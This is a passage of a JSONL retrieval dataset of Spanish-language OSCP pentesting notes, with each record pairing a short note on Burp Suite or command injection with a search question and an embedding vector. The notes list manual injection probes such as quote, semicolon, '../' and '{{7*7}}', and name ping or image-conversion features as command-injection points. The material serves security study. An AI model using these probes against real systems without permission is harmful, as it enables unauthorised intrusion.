-0.05825, 0.03863, -0.04418, 0.00216, -0.01775, 0.07188, 0.06681, -0.04597, -0.00468, -0.12712, 0.01748, 0.01836, 0.02834, 0.0071, -0.0257, 0.01078, 0.10155, 0.0091, -0.00382, -0.00962, -0.07856, -0.02453, -0.01106, 0.0262, -0.05653, -0.02304, 0.01854, -0.04855, 0.0208, 0.00583, 0.01956, 0.03122, 0.0346, 0.00081, 0.00177, 0.0512, -0.0698, -0.07721, -0.01824, -0.09575, -0.13891, -0.03975, -0.11975, -0.03321, -0.04452, 0.05083, 0.04407, 0.01646, -0.06968, 0.02343, 0.00176, -0.03115, -0.0579, -0.01755, -0.03454, -0.08738, -0.03213, 0.00299, 0.14345, -0.00389, 0.04381, -0.01575, -0.02331, -0.01689, 0.10926, -0.01571, -0.06769, 0.00944, -0.00602, -0.05404, 0.00253, -0.00767, -0.0348, -0.0519, 0.06787, 0.01244, 0.06776, 0.03243, -0.04639, 0.01578, -0.02712, 0.01346, -0.06754, 0.03789, -0.05353, -0.00776, 0.02641, -0.04973, -0.01054, 0.03137, -0.00902, 0.04883, 0.00747, 0.06225, 0.00964, 0.02702, -0.00328, -0.10567, -0.07034, -0.00572, -0.00705, 0.02225, -0.11433, -0.01294, 0.02198, -0.09911, -0.02328, -0.01601, -0.09817, 0.00968, 0.04405, 0.01575, 0.04083, -0.03034, 0.03133, 0.00472, -0.0231, 0.07184, -0.07193, 0.00555, 0.00844, 0.0443, 0.0704, -0.02743, -0.01861, 0.01984, 0.03934, 0.0657, 0.02704, -0.01895, 0.06469, 0.00119, 0.06701, 0.03455, 0.03896, 0.03351, 0.00768, 0.04996, -0.02118, 0.0569, -0.01882, 0.01325, 0.00281, -0.0097, -0.02081, 0.02085, 0.02734, -0.02183, -0.01945, -0.07908, -0.0191, -0.00157, -0.08251, 0.01089, -0.07299, 0.00652, 0.02497, -0.00657, -0.03228, 0.01221, 0.01787]} +{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Community vs Pro (OSCP)\nCommunity vale de sobra para el examen. Limitaciones: **Intruder va ralentizado** y **no hay scanner activo** (que de todas formas estΓ‘ prohibido β†’ Reglas de herramientas). Para fuzzing/fuerza bruta intensiva tira de Content discovery (ffuf) o hydra.", "indexar": "QuΓ© herramienta sirve para escanear y descubrir contenido si la versiΓ³n community tiene limitaciones?", "v": [-0.00364, 0.05862, -0.1466, -0.16448, 0.08281, -0.25743, -0.11697, -0.08816, 0.04889, -0.09614, -0.09938, -0.06976, -0.0312, -0.03206, 0.10346, 0.09922, 0.06095, -0.12426, 0.01782, 0.08211, -0.00564, 0.00911, -0.12878, -0.06777, -0.04447, -0.07942, 0.04038, -0.01655, -0.09246, 0.0122, 0.00658, 0.09712, 0.07053, 0.01643, -0.14027, -0.04665, 0.01069, -0.02466, -0.0282, -0.01322, 0.02269, -0.01333, -0.02483, -0.04433, -0.04332, -0.016, -0.08168, 0.09942, -0.02805, 0.14086, -0.13767, -0.02606, -0.06771, 0.07767, 0.03896, -0.07255, 0.14313, -0.14468, 0.01538, -0.0534, -0.13599, -0.02844, -0.03348, -0.12544, -0.03867, -0.02716, -0.07345, 0.04941, -0.02666, 0.10383, -0.07362, -0.01398, 0.12735, -0.03887, -0.1545, -0.06455, -0.01882, 0.01473, -0.00916, -0.0172, 0.14557, 0.03019, -0.06358, 0.00944, -0.04496, -0.11151, 0.04548, -0.09734, 0.059, -0.11333, 0.03814, 0.06452, -0.00742, 0.03394, -0.04233, -0.06023, 0.10131, 0.00499, 0.00312, 0.01829, 0.10239, -0.07321, -0.11387, 0.02737, -0.03345, 0.0405, 0.06052, -0.10262, -0.0749, -0.00368, 0.07722, 0.01219, -0.00597, 0.01729, -0.07884, 0.07196, -0.05041, -0.04544, 0.0209, -0.03955, -0.03732, 0.01397, -0.04264, -0.09521, 0.03357, -0.02751, -0.03659, 0.0823, 0.02071, -0.11699, -0.04027, -0.03506, -0.03625, -0.00507, -0.08412, 0.00141, 0.04094, -0.07582, -0.04731, -0.05296, 0.0465, -0.03224, -0.00548, -0.07139, 0.06669, 0.01613, 0.02963, -0.06606, -0.01751, 0.01403, -0.00761, -0.06156, -0.08333, 0.05877, -0.00727, -0.01743, 0.00258, -0.00562, -0.05307, 0.06635, -0.00353, -0.06683, 0.03366, -0.07414, -0.00693, -0.06388, -0.0181, -0.04837, 0.0739, -0.02375, -9e-05, 0.0473, 0.08112, -0.05405, 0.04183, -0.10534, -0.07151, -0.01963, -0.04893, -0.03693, -0.07723, 0.01085, -0.06191, -0.00933, 0.00851, -0.05915, -0.01912, -0.05179, -0.00584, -0.00517, -0.01197, 0.06468, 0.05148, -0.09741, -0.00989, -0.04781, -0.00769, -0.02851, 0.03207, -0.01316, -0.05412, -0.00631, -0.05433, -0.0249, 0.01871, 0.10739, -0.02749, -0.01822, 0.00014, 0.07929, 0.00892, -0.00467, -0.00463, 0.02972, -0.00732, -0.03331, 0.0424, 0.01424, -0.02352, -0.01666, 0.00656, 0.0526, 0.0771, -0.00762, 0.05577, -0.01903, 0.05869, -0.03134, 0.01614, -0.04261, 0.07707, 0.02637, -0.03435, -0.00627, 0.07955, -0.04573, 0.04594, 0.01987, -0.05609, -0.07995, 0.02464, 0.03698, 0.01713, -0.01876, -0.02837, -0.04379, 0.00424, 0.0024, -0.03811, -0.04672, -0.01086, 0.02753, 0.06864, -0.08558, 0.0372, -0.01019]} +{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Para quΓ© lo usas en cada vector\n- Cambiar `Content-Type` y extensiΓ³n en File upload bypass.\n- Manipular cookies/headers en Authentication attacks.\n- Probar a mano `'`, `;`, `../`, `{{7*7}}` en SQL injection, Command injection, Directory traversal, SSTI.\n\nRelacionado: Hacking web Β· OSCP MOC", "indexar": "que herramienta sirve para probar inyecciones SQL y travesa de directorios manualmente", "v": [0.03317, 0.00429, -0.1602, -0.16941, 0.1106, -0.21139, 0.0021, -0.13679, 0.0026, -0.03493, -0.12015, -0.09921, 0.06004, -0.23062, -0.06185, 0.07081, 0.06254, -0.12779, -0.06959, -0.02625, 0.07558, -0.02741, -0.09149, -0.0076, -0.0831, -0.02115, 0.0699, -0.01446, -0.19183, -0.02351, -0.05899, 0.01565, 0.07313, -0.06049, -0.05121, -0.08081, -0.04654, -0.00566, -0.01861, 0.02814, 0.02883, -0.00278, -0.16096, 0.08439, -0.04589, 0.01547, 0.03233, 0.05194, -0.12404, 0.07164, -0.06947, -0.09369, -0.10912, -0.08433, -0.00965, -0.08715, 0.18146, -0.07235, 0.04651, -0.01562, -0.08051, -0.01853, -0.04361, 0.05964, 0.00294, -0.0712, 0.03629, -0.16968, -0.12399, 0.09144, -0.09056, 0.06942, -0.03076, -0.01423, -0.02966, -0.03687, 0.04486, 0.06365, 0.05565, -0.05803, -0.04263, -0.11017, -0.09888, 0.07504, -0.043, -0.11162, 0.10153, 0.00818, 0.05189, -0.11668, 0.04595, -0.01778, 0.01028, 0.03183, 0.07352, -0.0034, 0.08824, -0.00353, 0.03466, -0.0006, 0.12001, -0.07304, -0.04559, 0.17108, 0.02827, 0.0792, 0.0207, 0.03491, -0.07865, 0.00154, 0.08914, -0.02113, -0.04861, 0.01097, 0.03139, 0.05376, -0.01363, 0.00084, -0.04044, 0.02633, -0.03502, -0.01516, -0.08016, 0.01026, -0.04099, -0.03776, -0.00957, 0.05524, 0.0043, -0.03779, 0.01856, -0.00578, -0.0965, -0.0013, -0.02071, 0.02383, -0.00413, -0.07573, -0.00781, -0.06776, -0.01258, 0.04094, -3e-05, -0.08169, 0.05113, -0.00974, -0.00616, -0.01129, -0.0249, 0.02484, 0.04426, -0.05781, 0.02329, 0.04714, -0.01343, -0.02146, 0.03078, -0.00367, -0.101, 0.08366, -0.02049, -0.01702, 0.06527, 0.0286, -0.01727, -0.06504, -0.01995, -0.05243, 0.10638, -0.01783, 0.00287, 0.03862, -0.0017, -0.0352, 0.0046, -0.02975, -0.02443, -0.02001, 0.06986, -0.04051, 0.02608, -0.01701, -0.04448, -0.0216, 0.0091, -0.06255, 0.02332, -0.01754, 0.04746, 0.0293, 0.04903, 0.06613, -0.00975, -0.07351, 0.03696, 0.01775, -0.02071, -0.05698, 0.00592, -0.00711, -0.01421, 0.04035, -0.04155, -0.09783, 0.04993, 0.06082, -0.04935, 0.0545, 0.00696, -0.00893, 0.03177, -0.00838, 0.09073, -0.00114, -0.01361, -0.01285, 0.02941, 0.00709, -0.00555, 0.01078, -0.02731, -0.0214, 0.12131, -0.00966, -0.03177, 0.0033, 0.05218, 0.00483, 0.033, 0.04319, 0.02162, 0.02228, 0.00427, -0.02832, 0.07247, -0.00449, 0.04898, -0.03132, -0.05046, -0.05196, 0.06288, 0.10482, -0.02003, -0.01422, -0.04328, -0.05018, -0.06369, 0.01343, -0.00053, -0.05965, -0.03473, -0.01257, 0.02623, 0.00125, -0.00605, -0.05964]} +{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Para quΓ© lo usas en cada vector\n- Cambiar `Content-Type` y extensiΓ³n en File upload bypass.\n- Manipular cookies/headers en Authentication attacks.\n- Probar a mano `'`, `;`, `../`, `{{7*7}}` en SQL injection, Command injection, Directory traversal, SSTI.\n\nRelacionado: Hacking web Β· OSCP MOC", "indexar": "con que puedo manipular cookies o headers en ataques de autenticaciΓ³n", "v": [0.13529, 0.0207, -0.05013, -0.04193, 0.0265, -0.08033, 0.01189, 0.19175, -0.05566, 0.02948, -0.08012, 0.0346, 0.02758, 0.0411, 0.00083, -0.08063, 0.15433, 0.00599, 0.14068, 0.00058, 0.09196, -0.03463, 0.00477, 0.05503, 0.06937, -0.00371, 0.02571, 0.1486, -0.08618, -0.09742, -0.02871, -0.03901, -0.00605, 0.02138, -0.06461, 0.03096, -0.11284, 0.05104, 0.13575, 0.09763, -0.00883, -0.0455, -0.06382, -0.04127, 0.07894, 0.01451, -0.00155, 0.01016, 0.11169, 0.00412, 0.1327, 0.00783, -0.22604, 0.07267, -0.10629, -0.00124, 0.04661, -0.1179, 0.0494, -0.03559, -0.10157, 0.09916, 0.03834, 0.03652, 0.08311, -0.02347, -0.00706, -0.11807, 0.06897, 0.05644, 0.05214, 0.00872, 0.07614, -0.04938, 0.09503, -0.01662, 0.05111, 0.0653, 0.04887, 0.06515, -0.04334, -0.01897, -0.03082, 0.00572, -0.06472, 0.03902, -0.0792, -0.11466, -0.00982, -0.10501, 0.07187, 0.09949, -0.07447, -0.07661, -0.02914, 0.03608, -0.01012, -0.13232, 0.04404, -0.03658, 0.0458, 0.01929, -0.10019, 0.12658, 0.07232, 0.02125, -0.00944, -0.08354, 0.05934, -0.06302, -0.12499, -0.04605, -0.04515, -0.0281, 0.07994, 0.08972, -0.06439, 0.06632, -0.00857, -0.12115, -0.08831, -0.10479, -0.07475, 0.0589, -0.02127, 0.03076, -0.01288, 0.00537, -0.09178, -0.07092, -0.10013, 0.07976, 0.0268, 0.10885, -0.06971, 0.04332, 0.02617, -0.09484, 0.05861, -0.01044, -0.00902, 0.10512, 0.11013, -0.0238, -0.00995, 0.06054, -0.12233, 0.0186, -0.05377, -0.11139, 0.07566, -0.02066, 0.03156, 0.09372, -0.01456, -0.0177, 0.01662, -0.0254, 0.02432, 0.11867, -0.0444, 0.04809, -0.0719, 0.0569, -0.02266, -0.00396, -0.05627, -0.04568, 0.09282, 0.07706, -0.08237, 0.03165, 0.08353, 0.02894, 0.04676, -0.04858, -0.0448, -0.05585, -0.0317, -0.04796, 0.04351, -0.06446, 0.00026, -0.0144, -0.00744, -0.01469, 0.04649, 0.03115, -0.00596, 0.06378, 0.0435, 0.02231, 0.00102, -0.00304, 0.05056, -0.03282, -0.03389, 0.01841, 0.03413, 0.04699, 0.09189, -0.05735, -0.00763, 0.04989, -0.01631, 0.10787, 0.0069, -0.06957, -0.03753, 0.01028, 0.00886, 0.00363, 0.06068, -0.02891, -0.06485, -0.04755, 0.06335, -0.02662, -0.01092, -0.00741, -0.00869, 0.01268, 0.02163, 0.02499, -0.02015, -0.01177, -0.02519, -0.03601, 0.00204, 0.01418, 0.00607, -0.00522, 0.00573, -0.0034, 0.05075, -0.01542, 0.06566, -0.00228, -0.04377, 0.00252, -0.00564, 0.01096, -0.0089, -0.02881, -0.01583, -0.01566, -0.1012, -0.02235, 0.02313, -0.01694, -0.02895, -0.01846, -0.00876, -0.01176, 0.02644, -0.02603]} +{"tipo": "pregunta", "herramienta": "Burp Suite", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Burp Suite.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Para quΓ© lo usas en cada vector\n- Cambiar `Content-Type` y extensiΓ³n en File upload bypass.\n- Manipular cookies/headers en Authentication attacks.\n- Probar a mano `'`, `;`, `../`, `{{7*7}}` en SQL injection, Command injection, Directory traversal, SSTI.\n\nRelacionado: Hacking web Β· OSCP MOC", "indexar": "hay algun programa para cambiar el contenido tipo en subidas de archivos", "v": [0.09667, 0.14209, -0.13042, -0.06921, 0.03201, -0.09572, -0.0555, -0.05101, -0.05015, -0.16527, -0.01338, -0.12757, 0.00496, -0.05698, -0.03912, -0.06079, 0.05186, -0.0715, 0.13588, 0.02692, 0.07639, 0.03181, 0.01206, -0.10507, 0.02053, -0.01489, -0.04209, 0.1132, -0.1038, 0.02814, 0.02267, 0.12881, 0.05458, 0.03759, -0.05184, -0.04759, 0.11401, 0.02658, -0.02285, -0.12066, -0.00537, 0.03451, -0.0067, -0.04408, 0.01374, -0.05001, -0.03489, 0.04546, 0.02355, -0.0774, 0.08079, 0.03653, 0.02464, -0.11352, -0.03464, -0.04646, 0.03974, -0.11879, -0.07426, -0.04029, 0.03262, 0.12878, 0.002, -0.01725, -0.08994, -0.04445, -0.072, 0.00141, -0.04909, 0.02344, -0.02753, -0.04448, 0.02189, -0.00314, 4e-05, -0.05108, 0.07784, -0.16244, -0.10583, 0.02867, -0.01367, 0.04375, 0.02093, 0.16824, -0.14086, -0.07468, -0.02139, -0.15783, -0.0426, 0.0247, 0.11759, -0.0538, 0.06563, 0.05339, -0.04196, -0.02232, 0.07489, -0.00399, 0.01644, 0.01951, 0.04884, -0.06442, 0.01208, 0.18376, -0.04094, 0.12559, 0.05238, -0.01551, -0.02886, 0.07034, 0.08226, 0.01844, 0.06932, 0.00322, -0.16633, 0.00732, 0.00316, -0.05504, 0.00199, -0.07744, -0.09246, 0.02381, -0.0027, 0.03391, 0.00188, -0.00021, 0.00626, 0.08857, -0.01479, 0.09717, 0.01065, 0.0921, 0.01447, -0.03255, -0.16696, -0.03847, 0.06302, 0.03269, -0.00425, -0.0779, 0.04857, 0.0905, 0.01203, 0.07674, 0.05959, -0.03083, 0.00578, -0.04704, -0.09679, 0.00992, -0.01789, -0.03368, 0.018, 0.01426, -0.03096, 0.04123, 0.04123, -0.15145, -0.04768, 0.09215, -0.13109, -0.00584, -0.00292, -0.03739, 0.00303, -0.05379, 0.02365, 0.06896, 0.04467, 0.00543, -0.06081, 0.08687, 0.02542, -0.10632, 0.01153, -0.02357, -0.04731, -0.11292, 0.03397, 0.01554, -0.03789, 0.0555, 0.08474, 0.03637, -0.04368, -0.07205, 0.01399, 0.03739, -0.02289, -0.01413, -0.05752, 0.00075, -0.07838, -0.0452, -0.05903, -0.03609, 0.00093, 0.05113, 0.0074, -0.01983, -0.04336, -0.03937, -0.02775, -0.03765, 0.04566, 0.02836, -0.04273, -0.00031, 0.07147, 0.06229, -0.02262, -0.05523, 0.04709, 0.02927, -0.00547, -0.02805, -0.00552, 0.13105, 0.01909, 0.05272, -0.02138, 0.01887, 0.04013, 0.00088, -0.02257, -0.04452, 0.02055, -0.04715, -0.02115, 0.00994, -0.05489, 0.03458, -0.01303, 0.02299, 0.08711, 0.04168, 0.0275, -0.02296, -0.04515, -0.09995, -0.04447, 0.05137, 0.02577, -0.05214, -0.0247, 0.01933, -0.07983, 0.01218, 0.00044, 0.00725, -0.03064, 0.03306, -0.02699, -0.04388, 0.06579, -0.01241]} +{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Command injection\n\n> Un parΓ‘metro web acaba dentro de un comando del sistema β†’ ejecutas comandos. RCE directo, vector top del Hacking web.", "indexar": "que tΓ©cnica es la inyecciΓ³n de comandos en una aplicaciΓ³n web", "v": [0.19167, 0.08143, -0.04107, -0.20415, 0.1188, -0.07736, -0.02075, -0.00519, 0.03018, 0.0882, -0.12206, -0.03064, 0.00092, -0.01772, -0.01905, 0.05655, 0.17492, -0.11947, 0.01773, -0.05265, -0.00078, -0.01253, -0.14392, -0.00723, -0.05555, 0.11327, 0.00037, -0.04904, -0.13924, -0.09691, -0.08129, 0.02264, 0.08297, -0.00389, -0.10971, -0.01837, -0.07986, -0.04442, 0.00174, 0.12873, -0.09468, -0.07085, -0.20864, 0.01337, 0.02987, -0.01558, 0.17406, 0.03735, 0.03211, -0.04538, 0.0237, -0.03334, -0.03974, -0.02048, -0.12207, -0.08204, 0.20406, -0.101, -0.019, 0.00315, -0.03741, -0.06283, 0.00092, 0.11019, 0.02458, -0.08911, -0.04389, -0.03663, -0.00805, 0.02661, -0.00086, 0.06258, -0.08136, 0.04575, 0.06983, 0.01693, -0.10469, 0.03928, 0.09331, -0.07462, -0.04159, 0.01648, -0.1024, 0.06016, -0.06793, -0.06804, 0.04902, -0.04913, 0.05501, -0.18165, 0.05732, -0.02681, 0.03307, -0.02143, 0.08904, 0.0509, 0.02483, 0.01515, 0.06755, 0.04953, 0.02228, -0.10139, -0.08822, 0.02009, 0.04433, 0.07453, 0.043, -0.13441, -0.00316, -0.02434, -0.02015, -0.06281, -0.01714, -0.00594, -0.04955, -0.04122, 0.02704, -0.04363, -0.07135, -0.09163, -0.13631, 0.0366, 0.03932, 0.02483, 0.0031, -0.05227, -0.11503, 0.00561, -0.03046, 0.03089, -0.01201, -0.02388, -0.02429, -0.00504, -0.04064, 0.1034, 0.02442, -0.01868, -0.0786, -0.06168, -0.00074, 0.04012, -0.03629, 0.04425, 0.05206, 0.0098, 0.01995, -0.08127, -0.05056, -0.04381, 0.03393, -0.02473, -0.05417, 0.07766, -0.07039, -0.04033, -0.03379, -0.0726, -0.04517, 0.06642, -0.03098, 0.01525, -0.05701, 0.03207, -0.04513, -0.04935, -0.07275, -0.04463, -0.0035, 0.04201, -0.00962, 0.07046, -0.03662, -0.01609, 0.04653, 0.01416, -0.02416, 0.00274, 0.04349, -0.08425, -0.01191, -0.02103, -0.00461, -0.01033, 0.05357, -0.04075, -0.10149, 0.05555, -0.00439, 0.01323, -0.02145, 0.03105, -0.05874, -0.01113, -0.00202, -0.02618, 0.0201, 0.0131, -0.03528, -0.00958, -0.07296, 0.00118, -0.00262, -0.08561, 0.00328, 0.01871, -0.00474, -0.00688, -0.0721, 0.01979, -0.00623, 0.00467, 0.01498, 0.07429, 0.01179, -0.11025, 0.04291, 0.00935, -0.06585, -0.03745, 0.0161, -0.03548, 0.04128, -0.05708, 0.00133, -0.02785, 0.0213, -0.01808, -0.00964, 0.04339, -0.01315, -0.04443, -0.02902, -0.03263, 0.08747, 0.01602, 0.00089, 0.02282, -0.06005, -0.05086, -0.03984, 0.04921, 0.03121, -0.00812, -0.02918, -0.0905, -0.12201, -0.02119, -0.03279, -0.04303, 0.01462, 0.03406, 0.05199, -0.02719, -0.00934, -0.02854]} +{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Command injection\n\n> Un parΓ‘metro web acaba dentro de un comando del sistema β†’ ejecutas comandos. RCE directo, vector top del Hacking web.", "indexar": "como puedo probar si hay vulnerabilidad de ejecuciΓ³n remota de comandos", "v": [0.18034, 0.04959, -0.18688, -0.1191, 0.06479, 0.0467, 0.08917, 0.04849, -0.10042, -0.06218, -0.06037, 0.0001, 0.14768, 0.00458, 0.01175, 0.11041, 0.11672, 0.02243, -0.09006, -0.06795, 0.08518, -0.1142, 0.01107, -0.01861, 0.05776, 0.03808, 0.06556, 0.03929, 0.02883, -0.16965, -0.01941, 0.01015, 0.10813, -0.04169, -0.07026, 0.10708, -0.07798, -0.01832, 0.07096, 0.11844, 0.06274, 0.02291, -0.10665, -0.02189, 0.07106, -0.06322, -0.01661, -0.03894, -0.03936, -0.04818, -0.0291, -0.0317, -0.11839, -0.09776, -0.02246, -0.02526, 0.17826, -0.07468, 0.03855, 0.03959, -0.03524, -0.04733, 0.10467, 0.08104, 0.05135, -0.11035, -0.09272, -0.06399, -0.1378, 0.09132, -0.05726, 0.04296, -0.10771, 0.04961, 0.00781, -0.06357, -0.06364, -0.03397, 0.07744, -0.02939, -0.03829, 0.03546, -0.03964, 0.03332, -0.15124, -0.16067, -0.0089, -0.05014, 0.05566, -0.08088, 0.11789, -0.03811, -0.0402, 0.03967, 0.06302, 0.02592, 0.06943, 0.01651, 0.03924, -0.03331, -0.02678, -0.0228, -0.0627, 0.12005, 0.00025, 0.0751, 0.03159, -0.04284, 0.05385, -0.07843, -0.01472, -0.11878, -0.07833, -0.04363, -0.08835, -0.03158, -0.06019, -0.05521, 0.0604, -0.0148, -0.10909, -0.04074, -0.04362, 0.03504, 0.02408, -0.02236, -0.04619, 0.00278, 0.04575, 0.02605, -0.00988, 0.00838, 0.06428, -0.02844, -0.01959, 0.13282, 0.01629, -0.04737, -0.0627, -0.10394, 0.05854, 0.03444, 0.03268, 0.02132, 0.05683, 0.01112, -0.00697, -0.02852, -0.05825, 0.05638, 0.05554, 0.02744, -0.08235, 0.06376, -0.07784, -0.05445, -0.03577, -0.06001, -0.00239, 0.09855, -0.03566, 0.04838, -0.0572, 0.02797, 0.04113, -0.02075, 0.03357, -0.04635, 0.05168, 0.00881, -0.08228, 0.06462, 0.02556, 0.01668, 0.04014, -0.1029, 0.0174, -0.02787, -0.00629, -0.05048, -0.02817, 0.02753, -0.05585, -0.07348, 0.01399, -0.00927, -0.00888, 0.01029, 0.0493, 0.03424, 0.02538, 0.01962, -0.03538, 0.04269, 0.02542, -0.03443, -0.00192, 0.00451, -0.04755, -0.04202, -0.08116, 0.00248, -0.00794, -0.05195, 0.08904, 0.02192, -0.00057, 0.06326, -0.01369, 0.06849, 0.07241, -0.04177, 0.09825, -0.03463, -0.0395, -0.05644, 0.03196, -0.01851, 0.00751, 0.02388, -0.01156, 0.01091, 0.08948, 0.02613, 0.03597, 0.0532, 0.01956, -0.01925, 0.04834, 0.00559, 0.02851, 0.01432, -0.04483, -0.04332, 0.06322, -0.00205, 0.01172, -0.02872, -0.04535, -0.04932, -0.01566, 0.08102, -0.01545, -0.08683, -0.00268, -0.07629, -0.0834, 0.03573, -0.02889, -0.07341, -0.05307, 0.04605, 0.04881, -0.06987, -0.03565, -0.04988]} +{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Command injection\n\n> Un parΓ‘metro web acaba dentro de un comando del sistema β†’ ejecutas comandos. RCE directo, vector top del Hacking web.", "indexar": "cuales son los vectores mΓ‘s comunes para ejecutar cΓ³digo en una pΓ‘gina web", "v": [0.15832, -0.02117, -0.0213, -0.04013, -0.02485, -0.13912, 0.16358, -0.06425, 0.04123, -0.2235, -0.12414, -0.16264, -0.06882, -0.08207, 0.16175, 0.02634, 0.19695, -0.2029, 0.11759, -0.01377, 0.01168, -0.079, 0.03021, 0.01981, -0.08607, 0.06035, 0.02355, 0.02529, -0.06339, -0.03381, -0.00978, -0.05959, 0.0854, 0.03472, -0.11465, 0.08169, 0.04323, 0.05713, -0.08196, 0.09177, -0.03913, 0.09648, -0.1635, -0.05026, -0.04731, 0.00761, -0.00296, -0.05612, -0.01195, -0.11164, -0.07456, 0.07178, -0.13479, 0.04624, -0.06665, -0.00819, 0.0985, 0.00031, -0.03741, 0.0181, 0.01565, -0.03042, 0.00739, -0.10023, -0.05535, -0.04493, -0.02081, 0.02504, -0.02, 0.03888, -0.00814, 0.0704, -0.01647, -0.00388, 0.10065, 0.0142, -0.00892, -0.05099, -0.00197, 0.04601, -0.01124, -0.04957, -0.09339, -0.00662, -0.0267, -0.02324, -0.04643, -0.07764, 0.05791, -0.11369, 0.14048, -0.01509, -0.00442, -0.0174, -0.01818, -9e-05, 0.05145, 0.06381, 0.11876, -0.02626, -0.00144, -0.08582, -0.05227, 0.01754, 0.14262, 0.07807, 0.03608, 0.01877, -0.01865, -0.01912, 0.00786, -0.11177, -0.09152, -0.07704, -0.09183, -0.05254, -0.00735, 0.0286, 0.03662, -0.12962, -0.13398, -0.02453, -0.08983, 0.05515, -0.01176, 0.08805, 0.00809, 0.04005, -0.01877, -0.06443, -0.07308, -0.01193, -0.06494, -0.02302, -0.00453, 0.09902, 0.08736, -0.03355, 0.0561, -0.03625, 0.02587, -0.02233, 0.00135, 0.02146, 0.03953, 0.02925, 0.0529, -0.06226, -0.15139, 0.0169, 0.029, 0.08631, -0.0367, 0.00699, -0.08798, 0.01008, -0.03904, -0.00591, 0.01849, 0.0039, -0.03657, 0.03812, -0.04987, -0.0265, 0.03535, 0.01668, -0.10453, 0.01236, 0.05515, 0.04214, 0.06727, 0.05114, 0.03783, -0.07755, 0.04325, -0.0623, -0.11053, -0.05227, 0.0577, -0.02008, 0.00081, 0.02818, 0.05758, 0.02272, -0.03613, -0.02101, 0.06456, 0.02028, -0.00072, 0.01657, 0.02058, 0.03549, -0.0736, 0.00891, 0.02178, -0.00974, -0.01087, 0.02504, -0.01722, -0.10623, -0.01814, -0.01281, 0.03307, -0.05486, -0.02288, 0.05967, -0.02306, -0.06137, -0.02638, 0.07651, 0.01357, -0.02994, 0.05421, -0.02581, -0.01294, -0.01644, 0.03351, 0.00426, 0.04846, -0.01221, 0.03154, 0.01318, -0.02584, -0.01408, 0.03702, -0.02848, 0.01921, 0.03278, -0.00096, 0.06106, -0.03898, -0.01497, -0.00932, -0.02203, 0.04028, 0.04836, -0.01559, 0.0119, -0.04224, -0.03489, 0.00883, 0.02939, -0.01667, -0.02563, -0.0137, -0.03929, -0.10353, -0.05708, -0.02095, -0.0382, -0.03481, 0.01205, 0.06929, -0.0174, -0.01074, -0.02381]} +{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## DΓ³nde aparece\nFunciones que \"hacen algo\" con tu input: `ping`, `nslookup`, convertir imΓ‘genes, export, backup, \"test connection\".", "indexar": "quΓ© programa sirve para comprobar la conectividad de una red", "v": [0.13411, 0.05304, -0.15277, -0.11116, 0.22933, -0.07114, 0.02873, -0.02075, 0.05345, -0.16057, -0.15366, -0.03679, -0.07435, -0.15487, 0.07718, 0.08516, 0.06992, -0.07402, 0.11154, 0.03739, 0.14297, -0.00117, -0.08284, -0.09913, 0.07997, 0.15539, 0.08737, -0.03183, 0.00951, 0.0159, -0.03662, -0.01158, 0.02661, 0.00886, -0.08541, 0.09871, 0.09184, 0.04526, 0.02592, 0.06277, 0.03105, 0.00972, -0.01442, 0.01479, 0.06953, 0.00743, 0.02216, -0.07236, -0.06488, 0.01088, -0.06908, 0.04591, -0.09984, -0.02328, -0.05442, -0.0772, -0.06914, -0.03119, -0.01408, -0.03605, 0.00486, -0.0162, 0.0018, -0.02358, 0.07491, -0.04851, 0.0317, 0.03703, -0.07237, 0.01581, -0.01845, 0.07364, -0.03154, 0.01907, -0.04322, -0.00258, 0.03117, -0.06746, 0.09672, -0.02981, 0.03767, 0.03515, -0.00306, 0.03428, -0.03866, -0.00883, 0.05441, -0.073, -0.03305, -0.06597, 0.05042, 0.08198, 0.06849, 0.01212, 0.09246, -0.04816, 0.10903, -0.05125, 0.04791, 0.06252, 0.06078, -0.01274, -0.11158, 0.0907, -0.08217, 0.12322, 0.09065, 0.01207, -0.00505, 0.03407, 0.02717, -0.02055, -0.0124, -0.06642, -0.08699, -0.02681, -0.01546, -0.03786, -0.06616, -0.04792, -0.08101, 0.02799, -0.03576, 0.00677, 0.0721, 0.03551, -0.06917, 0.09624, -0.00728, 0.11519, -0.00615, 0.01397, 0.02111, -0.10347, -0.09289, -0.03746, -0.0099, -0.12714, -0.02147, -0.05656, 0.0305, 0.05673, -0.03155, 0.00146, -0.00048, 0.05309, 0.023, -0.02357, -0.05906, 0.10734, -0.02968, 0.03519, -0.05506, 0.03816, -0.02444, 0.04107, 0.07139, 0.00636, -0.06639, 0.0675, -0.05045, -0.04839, 0.01577, -0.03188, 0.0513, -0.03803, -0.02144, 0.02143, 0.14135, 0.10219, -0.02605, 0.06704, -0.06548, -0.10543, -0.07294, 0.00126, -0.01432, -0.10148, 0.05116, -0.13723, -0.04189, 0.02692, 0.04634, -0.02912, 0.0042, 0.00253, -0.07605, -0.04116, 0.05922, -0.00733, -0.00443, -0.00471, 0.04153, 0.05279, 0.03469, -0.02417, -0.02432, -0.02675, 0.07016, -0.0452, -0.10712, 0.03956, 0.00122, -0.01038, 0.06481, 0.11371, 0.00322, 0.01138, 0.06121, 0.16324, 0.03342, -0.03762, 0.09163, -0.00987, -0.05576, 